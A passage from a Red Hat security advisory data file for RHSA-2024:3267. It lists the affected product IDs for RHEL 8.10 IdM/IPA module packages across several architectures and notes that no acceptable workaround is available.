"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
